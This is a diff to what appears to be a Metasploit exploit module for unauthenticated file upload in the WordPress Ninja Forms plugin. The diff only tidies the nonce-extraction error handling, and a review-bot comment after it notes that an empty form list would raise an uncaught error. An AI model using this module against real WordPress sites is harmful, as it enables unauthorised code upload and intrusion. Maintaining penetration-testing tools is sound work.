diff --git a/modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb b/modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb
index ea20269ef1..15a045a743 100644
--- a/modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb
@@ -106,12 +106,18 @@ class MetasploitModule < Msf::Exploit::Remote
 )
 unless res && res.code == 200
- fail_with Failure::UnexpectedReply, "Unable to access FORM_PATH: #{datastore['FORM_PATH']}"
+ fail_with(Failure::UnexpectedReply, "Unable to access FORM_PATH: #{datastore['FORM_PATH']}")
 end
 form_wpnonce = res.get_hidden_inputs.first['_wpnonce']
- res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1] || form_wpnonce
+ nonce = res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1] || form_wpnonce
+
+ unless nonce
+ fail_with(Failure::Unknown, 'Cannot find wpnonce or ajaxNonce from FORM_PATH')
+ end
+
+ nonce
 end
 def upload_payload(data)
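Review bot: The added `unless nonce` guard is never reached when the response carries no hidden inputs, because the unchanged line `form_wpnonce = res.get_hidden_inputs.first['_wpnonce']` indexes the result of `.first` directly. If that list is empty (presumably the case when the page at FORM_PATH has no form), `.first` is nil and the method raises NoMethodError instead of the clean `fail_with` this commit introduces. A nil-tolerant lookup such as `form_wpnonce = (res.get_hidden_inputs.first || {})['_wpnonce']` lets the new check handle that case. For consistency with the 200-status check just above, `Failure::UnexpectedReply` also seems a closer fit than `Failure::Unknown` for a reply that lacks both nonces. The method's start is outside the hunk, so the request that produces `res` is not visible here.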